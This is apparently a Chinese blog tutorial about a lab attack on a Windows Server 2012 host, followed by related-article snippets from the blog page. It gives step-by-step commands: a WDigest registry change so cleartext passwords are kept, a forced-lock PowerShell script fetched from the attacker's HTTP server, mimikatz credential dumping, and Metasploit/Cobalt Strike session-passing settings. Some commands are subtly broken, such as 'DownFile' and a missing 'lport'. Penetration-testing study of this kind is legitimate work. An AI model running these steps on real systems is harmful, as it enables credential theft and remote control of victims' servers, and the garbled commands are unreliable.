cs与msf权限传递以及mimikatz抓取win2012明文密码

最新推荐文章于 2024-07-14 18:18:00 发布
最新推荐文章于 2024-07-14 18:18:00 发布
阅读量816 收藏 23
点赞数 21
文章标签: 网络 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huizhaohaha/article/details/139168405
版权

简单的介绍

cs与msf的简单介绍

我查找过资料得出,Cobalt Strike 的前身是 Armitage,而 Armitage 又可以理解为 Metasploit Framework 的图形界面版,因此 Cobalt Strike 与 Metasploit Framework 在很多地方都是兼容的,所以我们便可以将 Metasploit Framework 攻击产生的会话传递到 Cobalt Strike 上,同样的 Cobalt Strike 的会话也能够传递到 Metasploit Framework

环境信息

攻击IP:192.168.17.132(kali——cs服务端、msf所在主机)

靶机IP:192.168.17.134(win2012)

Cobalt Strike抓取win2012明文密码,以及将会话传递到 Metasploit Framework 上整体过程

1.cs生成木马文件并使目标服务器中马

启动cs(首先启动cs服务器,然后启动客户端)

建立监听

这样一个监听就创建好了

生成木马

使目标服务器中马后,我们就可以获取想要的东西了(这里就不演示了)

2.抓取目标主机的明文密码

目标服务器已上线

因为微软的补丁已经不容许抓取明文密码了,但是我们通过修改注册表来让Wdigest Auth保存明文口令。

shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

修改注册表成功之后,需要用户注销或者重新登陆之后才会生效。所以我们编写一个强制锁屏脚本(这个脚本只有Windows服务器可以生效)

Function Lock-WorkStation {

$signature = @"

[DllImport("user32.dll", SetLastError = true)]

public static extern bool LockWorkStation();

"@

$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru

$LockWorkStation::LockWorkStation() | Out-Null

}

Lock-WorkStation

在锁屏脚本目录下开启http服务器,控制目标服务器下载并执行锁屏脚本

shell powershell (new-object System.Net.WebClient).DownFile('http://192.168.17.132:9999/lock-screen.ps1','c:\lock-screen.ps1') #下载锁屏脚本
shell powershell c:\lock-screen.ps1 #执行锁屏脚本

管理员重新登录后再抓取明文密码

logonpasswords

这样我们使用cs成功抓取win2012服务器的密码了。

3.打开Metasploit Framework

调用 exploit/multi/handler 模块,在该模块上配置 HTTP Payload,为该 payload 的 IP 和 端口设置成 Metasploit Framework 所在主机 IP,端口自定义即可。之后运行该模块

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set 9980
run

4.在 Cobalt Strike 上创建一个 Foreign HTTP 的监听

监听 IP 和端口设置成刚才 Metasploit Framework 上所监听的 IP 和端口,接着在 Cobalt Strike 上右击选择要传递的会话,找到 Spawn 选项,选择刚刚创建的监听器即可

成功将cs的会话传递到msf上了。

Metasploit Framework抓取win2012明文密码,以及将会话传递到 Cobalt Strike 上整体过程

1.msf生成木马文件并使服务器中马

启动msf

生成木马

使目标服务器中马后,我们就可以获取想要的东西了(这里就不演示了)

2.抓取目标主机的明文密码

因为微软的补丁已经不容许抓取明文密码了,但是我们通过修改注册表来让Wdigest Auth保存明文口令。(由于我在cs入侵Win2012服务器是已经在服务器上下载过强制锁屏了,所以这就直接使用,不用在进行远程控制下载了。)

shell #进入cmd窗口
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f #修改注册表
powershell  #进入powershell
c:\lock-screen.ps1 #运行强制锁屏脚本

上传mimikatz(和在cs上远程控制服务器下载强制锁屏脚本一样,只需要在kali上开启http服务器就可以了)

启动mimikatz获取明文密码

execute -i -f mimikatz.exe
sekurlsa::logonpasswords

我们使用mimikatz就抓取到了win2012的明文密码。

3.打开Cobalt Strike

创建一个监听

4.打开Metasploit Framework

background 
use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set lport 8899
set disablepayloadhandler true
set prependmigrate true
set session 2 #根据自己的session值
exploit

成功将msf的会话传递到cs上了。

稚锦
关注
  • 21
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MSFmimikatz模块的使用
谢公子的博客
11-10 4017
目录 mimikatz模块的加载 mimikatz_command模块的用法 Kerberos模块 Livessp模块 MSV模块(列出密码哈希) SSP模块 tspkg模块 Wdigest模块 mimikatz模块的加载 mimikatz模块的使用需要Administrator权限或者System权限MSF中自带mimikatz模块,MSF中的 mimikatz 模块同时支...
Mimikatz2.2 如何抓取Win11登录明文密码
本博客,博文仅代表个人操作经验,不能完全解决你的问题,仅供参考,佛系回复。
03-25 2466
1.攻击者IP:192.168.1.35系统: KALI2022(vmware 16.0)2.靶机IP:192.168.1.16系统: Windows113.USB无线网卡4.Mimikatz 2.2 (win版)
【工具使用】——MSF使用_MSF中kiwi(mimikatz)模块的使用
热门推荐
weixin_45588247的博客
08-08 1万+
文章目录一、简介:二、前提:1. 提权到system权限:1.1 提到system有两个方法:1.2 进行提权:2. 进程迁移:三、kiwi模块的使用:1. creds_all:2. kiwi_cmd: 一、简介: kiwi模块:   mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。 二、前提: 1. 提权到system权限: 1.1 提到system有两个方法:   一是当前的权限是admin
cs木马制作与于远程控制
最新发布
2301_79580906的博客
07-14 606
cs木马制作与远控
CS + MSF 联动
A_dmin的博客
12-23 1593
CS + MSF 联动 首先cs上已经成功上线: Kali查看IP地址: Msf上操作: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.198.128 set lport 7777 exploit -j #-j 后台监听(ps:这里手抖少打了一个7) 如果msf处于公网,cs添加监听器Listener,HOST和PORT填写msf监听的地址IP:xxxx,PORT:7777
实用csmimikatz免杀virscan
xxx9686的博客
09-17 1924
第一步:替换资源,此步骤可以直接免杀360及电脑管家,但是无法过火绒。使用Restorator加载mimikatz后在拖入其他程序资源(此处需要注意,资源需要无毒,资源越好效果越佳。sigthief.py -i 软件文件名 -t 木马文件名 -o 输出位置(此处由于软件从虚拟机中考出有问题,无图)。替换版本及图标资源后,需要给软件上数字签名(正儿八经的软件签名我们没有,可以copy别的软件做伪签名)。简单过360,但是资源未过火绒,在此基础上我们给他添加一个壳即可,任意壳,我们添加vm壳。
msfcs联动
qq_63501912的博客
02-06 938
msfcs之间的会话传递
MSFCS联动
GoDunTong's Blog
04-08 4185
转载自Snowming04’s Blog 0x01 准备工作 受害主机:在关闭 Windows Defender 和其他一切杀软的前提下,在 Win 10 主机下进行的实验。 MSF:本地 kali Cobalt Strike 团队服务器:Ubuntu VPS Cobalt Strike:3.14 团队服务器: 客户端: 上线过程: 因为我关闭了一切杀软及 Windows Defender,自不必做免杀。 一些朋友搞不清楚 Windows Executable 和 Windows Exec.
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
本课程重点讲解了如何利用Metasploit(MSF)框架进行渗透测试,通过Web传递的方式获取靶机权限。以下是详细的知识点解析: 1. **Metasploit框架**:Metasploit是一款开源的安全漏洞检测工具,它包含了大量的漏洞...
通信与网络中的MSF基于组件的业务框架
11-14
MSF业务框架的目标是通过明确的接口定义,促进组件间以及组件与代理之间的松耦合,从而提高业务的可维护性和可扩展性。这种架构允许开发人员专注于单个组件的功能,同时确保整体业务流程的顺畅。此外,通过解耦,...
基础电子中的MSF业务框架与IMS的关系
11-14
MSF(Method for System Specification and Development,系统规范与开发方法)是一种在电信行业中广泛采用的业务框架,它旨在提供一个高效、结构化的开发过程,以适应不断变化的市场需求和技术创新。MSF的核心是...
Msf攻击Win7
07-09
总的来说,Msf攻击Win7涉及到的信息安全实践包括:漏洞扫描(使用Nessus)、漏洞利用(使用Metasploit)以及对目标系统的远程控制。在整个过程中,安全测试者必须遵守合法授权和道德规范,仅用于合法的测试目的。
通信与网络中的MSF250的DS1/E1信号格式
12-10
MSF250是一种多业务成帧芯片,其主要功能在于处理通信网络中的DS1/E1信号格式。DS1(T1)和E1(欧洲的T1版本)是数字语音和数据通信的标准,通常用于将多个较低速率的信号(如DS0,每个24kbps)复用成更高速率的链路...
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
基于MSF的增强版多源传感器融合框架 (VSLAMIMUGNSS).zip
01-24
此外,鉴于KITTI数据集本身的缺陷,以及跑MSF的需要等原因,要想完整跑出理想MSF效果,需要KITTI数据预处理、MSF源码修改,GPS加噪声(可选),ORBSLAM2的publish位姿的话题(topic),轨迹显示等各项操作,不过我...
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,...与具有固定框架的方法相反,MSF提供了一个可以伸缩的灵活框架,以满足任何规模的组织或者项目开发团队的需要。MSF指导由原理、模型和用来管理人员、项目和技术元素的准则
csmsf传shell+mimikatz读取明文密码
vt_yjx的博客
05-22 630
set payload windows/meterpreter/reverse_http(注:这里是http,与cs上线的监听器一致)密码是null,是因为官方改的。然后输入密码后给到lsass.exe这个进程,这个进程会存储一份明文再内存中。windows输入密码的进程是winlogon.exe。考虑sam文件了,可以dump出来本地破解出明文。上传一个锁屏脚本,管理员重新输入密码后可以抓明文mimikatz就抓内存中的明文。set lport 自己的端口号。set lhost 本机ip。
MSF&CS互相联动
剁椒鱼头没剁椒的博客
07-28 1775
在日常渗透测试或者是你偷偷干坏事的时候,可能会发现,CS确实是一个强大的后渗透工具,但是奈何CS很多关于漏洞的功能都是只能检测,但是不能攻击,所以需要CSMSF互相联动起来,这里我就利用一个永恒之蓝漏洞来。
csmsf联动概述
weixin_43873557的博客
02-08 2424
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各类内网信息搜集及漏洞利用。为了取各家之所长,我们进行联动。 获得beacon shell,启动socks shell ipconfig 目标机器在24.*网段,仅一个网段 思路:利用 beacon shell 在目标机器和团队服 务器之间建立 socks,而后再在本地利用proxychains 之类的工具连到目标内网即可。 查看团队服务器 socks 端口启起来了没有:netst
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值